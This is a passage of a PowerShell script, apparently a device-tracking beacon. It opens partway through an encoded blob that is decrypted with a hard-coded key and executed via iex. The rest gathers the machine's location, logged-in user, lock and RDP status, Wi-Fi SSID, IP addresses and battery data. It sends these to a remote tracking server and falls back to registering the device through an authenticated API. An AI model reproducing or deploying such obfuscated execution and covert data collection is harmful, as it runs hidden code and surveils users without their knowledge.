gAOQAxAGUAZABkADYANgBjADYAZAA1ADEAYQBiAGIAMwBlADAANgA2ADYAMAAwAGIANwAwADYAOAAxADIAYwA1ADcAMAA2AGYAOQBjAGYANAA3AGUAMQBkAGQANwBmADgAYgA3ADcAOAA1AGQAMwBhAGEAMwAzADQANAA3ADkAYQAzADAAMQBiAGUAOQA5ADYAZgA0ADYAMAAwAGYANgAzAGEANwA3AGQAOQA3AGUAYgA2ADkAZAA4AGUANABlADAANQA5AGYAZQA5ADQAZAA3ADcAZgA5AGYAOABhADgANwBkADAAOABmAGMAMABiADQAMAA2ADUAMQBjADQAOAA0ADEAYgA2ADAANwAwAGIAMABmAGYANQBhADQAMQA0AGMANQA1ADQANABjADkAMQBjAGEAZABhADkAYwBiADYAMABmADQAYgBiADIAZQBhAGYAMgAxAGQAZABkADQAZABjAGEANQBmADAAZgAyADkAYQA1ADcAYgA3ADYAMABlADAAMwBiADgAMAA0AGUAYwBjAGIAMwA1ADIAMwA2AGEAYgA5ADkANQA4AGQAZABiAGUANQA4AGMAMQA0ADMAMwAwAGUAYQA4AGUAMwA1AGIANQBjAGUAMQAwADYAMwAxAGEANgA4ADkANwAzADIAZAA2ADUAYgAyADIAMwA1ADIANQAwADAANAA4ADYAMAA4AGQANwAxADEAMABhADcANgA4AGQAMwBlADkAMgBkAGEANQA3AGEANwBmAGUAZgA4AGUAOQA4ADAAMgBiADAANwAyADkAYgA3AGYAYgBhAGMANgBkADUAOABlAGYAMwBjADAAYwA5ADAAOQBiADkANgA3ADgAOQBlADIAMgA4ADAANgA2AGMAMgBkADkAYwAxADUAOAAwADkANwA3ADEAZgA2AGIAOQA0ADMAOABkADIANQBkAGQAZgBlADAAYQAxADAANwA3ADQAOAA4AGQAZQA5AGEAMgBjADIANgBjADgAYgBmAGEANABmADMAZQAzAGMAZQAxADAAZQBhAGYAZgBmADAANgA4ADUANgAwAGYAZQA1AGEAZAA4ADQAZgBkADgAOABmADAAYgA1AGMAZgBlADgAZgBkAGUAMwBiADIAMABkADcAYQBmADgAYQAyADkANQA3AGEANwBmADAAYgBlAGQAYwBmADQAMgA3AGMAZQAxADcAMgBjADUAMAAwADgAYQBmADkAMgBhAGQAMwA3ADMANQA2ADIANABlADIAOAA4ADcAMwA4ADkAMwBhADcAMQA4ADUAOQAxADgANwA2AGEANAAwAGQANQAyADIANgBhADYAMQAyAGYAYwBhAGUANgA4ADYANwAzAGYAZQA0ADkAMABjADIAMgA5AGEAYwBhADAANgAyADAAOAAzADEAMwBjADEAOAA0ADUAMQA3ADAAMgAzAGQAMABjAGEAYgA4AGMAMwA='|coNVERTtO-seCurEStRiNg  -k (40..55))) ))| iEx



#Disable accuraty if precision to hight
if ($result.position.precision -gt 4000) {$result.position.precision=0}

#Calculate unix seconds timestamp
$date1 = Get-Date -Date "01/01/1970"
$date2 = [System.DateTime]::UtcNow
$ts=[int](New-TimeSpan -Start $date1 -End $date2).TotalSeconds

#Check charge and power, processing for pc
$tbmpbatt=Get-CimInstance -ClassName Win32_Battery
$charge=$tbmpbatt.EstimatedChargeRemaining
$ac = (Get-WmiObject -Class BatteryStatus -Namespace root\wmi -ComputerName "localhost").PowerOnLine
if ($charge -eq $null) {$charge = 100} 
if (($ac -eq $null) -or ($ac -eq 'True')) {$ac = 'AC'} else {$ac = 'Battery'}
$charge = [int]$charge
if ($charge -is [int]) {
} 
else{
    $charge = ''
}

$eastruntime=$tbmpbatt.EstimatedRunTime
$battstatus=$tbmpbatt.Status
if ($eastruntime -is [int]) {

} 
else{
    $eastruntime = ''
}




[Console]::OutputEncoding = [System.Text.Encoding]::GetEncoding("cp866")
$networkInterfaceAlias=''
$net_name=''
$netsh = netsh wlan sh int | Select-String signal,ssid,сигнал

$ssid = $netsh.Item(0)
$ssid = $ssid -replace 'SSID',''
$ssid = $ssid -replace ':',''
$ssid = $ssid -replace '\s',''

$signal = $netsh.Item(2)
$signal = $signal -replace 'Сигнал',''
$signal = $signal -replace ':',''
$signal = $signal -replace '\s',''
$signal = $signal -replace '%',''


$network = Get-NetConnectionProfile
#$network | ConvertTo-Json


$computer = 'localhost'
        $user = $null 
        $lockuser = ''
        $lckuser = $null
        $userstatus = $null

if (Test-Connection $computer -Count 2 -Quiet) { 
    try { 
        $user = gwmi -Class win32_computersystem -ComputerName $computer | select -ExpandProperty username -ErrorAction Stop 
        } 
    catch { $userstatus='Not logged on'; return } 
    try { 
        if ((Get-Process logonui -ComputerName $computer -ErrorAction Stop) -and ($user)) { 
            $userstatus='locked'
            $lockuser = $user
            } 
        } 
    catch { if ($user) { 
#    "$user logged on"; $userstatus='logged on'
    } } 
    } 
$tmpdid = gwmi -Class win32_computersystem -ComputerName $computer
$deviceid = $tmpdid.Name+'.'+$tmpdid.Domain


if (($user -eq $null) -and ($userstatus -eq $null)){
    $rdp = QUERY SESSION
    $rdp = $rdp  -replace "\s+", ";"
    $rdp = $rdp  -replace "Active", "Активно"
    $rdp = $rdp -match 'rdp-tcp#'
    $rdp = $rdp -match 'Активно'
    $rdp = $rdp | ConvertFrom-Csv -Delimiter ';' -Header 'session','user','id','status' 
    
    if (($rdp[0].user -ne '') -and ($rdp[0].user -ne $null)){
        $user = $rdp[0].user
        if ($user -match 'rdp-tcp'){$user = $rdp[0].id}
        $userstatus = "logged rdp"
    }
}
if ($user -notmatch $cdomain+'\\'){$user = $cdomain+'\'+$user}
if ($userstatus -eq $null){$userstatus='dont login'}

$user=$user.ToLower()
#$manuname.PCSystemType
if ($manuname.PCSystemType -eq '') {$PCSystemType = ''}
if ($manuname.PCSystemType -eq '6') {$PCSystemType = '&type='+'Appliance PC'}
if ($manuname.PCSystemType -eq '1') {$PCSystemType = '&type='+'Desktop'}
if ($manuname.PCSystemType -eq '4') {$PCSystemType = '&type='+'Enterprise Server'}
if ($manuname.PCSystemType -eq '8') {$PCSystemType = '&type='+'other'}
if ($manuname.PCSystemType -eq '2') {$PCSystemType = '&type='+'Mobile device'}
if ($manuname.PCSystemType -eq '7') {$PCSystemType = '&type='+'Performance server'}
if ($manuname.PCSystemType -eq '5') {$PCSystemType = '&type='+'SOHO Server'}
if ($manuname.PCSystemType -eq '0') {$PCSystemType = '&type='+'unspecified'}
if ($manuname.PCSystemType -eq '3') {$PCSystemType = '&type='+'Workstation'}

if ($manuname.SystemFamily -ne '') {$SystemFamily = '&versionHw='+$manuname.SystemFamily}
if ($manuname.NumberOfProcessors -ne '') {$NumberOfProcessors = '&NumberOfProcessors='+$NumberOfProcessors.Model}
if ($eastruntime -ne '') {$eastruntime = '&eastruntime='+$eastruntime}
if ($battstatus -ne '') {$battstatus = '&battstatus='+$battstatus}

$result.position.altitude = '&altitude='+$result.position.altitude
if ($ipinf.zip -ne '') {$ipinf.zip = '&zip='+$ipinf.zip}
if ($ipinf.isp -ne '') {$ipinf.isp = '&operator='+$ipinf.isp}
try{
if ($user -ne '') {$login = '&username='+$user}
if (($username.Item(7) -ne $null) -and ($username.Item(7) -ne 'system')) {$logt = '&logintime='+$username.Item(6)+' '+$username.Item(7)}
} catch {}
if ($domain -ne '') {$domain = '&domain='+$domain}
if ($ssid -ne '') {$ssid = '&ssid='+$ssid}
if ($signal -ne '') {$signal = '&rssi='+$signal}
if ($network.InterfaceAlias -ne $null) {$networkInterfaceAlias = '&InterfaceAlias='+$network.InterfaceAlias}
if ($network.Name -ne $null) {$networkName = '&net_name='+$network.Name}
if ($userstatus -ne '') {$userstat = '&status='+$userstatus}
if ($lockuser -ne '') {$lckuser = '&Locked by='+$lockuser}
if ($charge -ne '') {$charge = '&batt='+$charge}
if ($manuname.PCSystemType -ne '2'){
    $charge=''
    $ac = 'AC'
}
$Ignition = '&ignition=false'
if ($userstatus -eq 'logged on') {$Ignition = '&ignition=true'}
if ($userstatus -eq 'locked') {$Ignition = '&ignition=false'}
if ($userstatus -eq 'logged rdp') {$Ignition = '&ignition=true'}
if ($userstatus -eq 'dont login') {$Ignition = '&ignition=false'}

$satVisible='&satVisible='+$warr.Count



$localip = Get-NetIPAddress -InterfaceAlias $network.InterfaceAlias
#$localip | ConvertTo-Json
if ($localip.IPAddress -ne '') {$localip = '&localIP='+$localip.IPAddress}

$deviceid=$deviceid.ToLower()

$uri= $srvproto+'://'+$server+'/?id='+$deviceid+'&timestamp='+$ts+'&lat='+$result.position.latitude+'&lon='+$result.position.longitude+$result.position.altitude+'&realip='+$ip+$charge+$ipinf.isp+'&power='+$ac+'&accuracy='+$result.position.precision+'&vin='+$deviceid+$ipinf.zip+$login+$domain+$logt+$ssid+$signal+$networkName+$userstat+$lckuser+$networkInterfaceAlias+'&versionFw='+$ver+$localip+'&channel=local_script'+$PCSystemType+$SystemFamily+$eastruntime+$battstatus+$dtcs+$Ignition+$satVisible
$debug=''

try{
Invoke-RestMethod -Uri $uri -Method 'Get'-ContentType 'application/x-www-form-urlencoded'
}
                    catch  {
                    $tlogin=$user
                    $tmpcdomain=$cdomain+'\\'
                    $tlogin = $tlogin -replace $tmpcdomain.ToLower(),''
                    $tlogin = $tlogin -replace $tmpcdomain.ToUpper(),''

                    $body = '{"name": "'+$tlogin+$mdomain+'","uniqueId": "'+$deviceid+'","disabled": false,"positionId": 0,"groupId": 2,"attributes": {}}'
                    Invoke-RestMethod -Headers @{Authorization=("Basic {0}" -f $base64)} -Uri $apiUri  -Method 'Post' -Body $body -ContentType 'application/json'
                    }
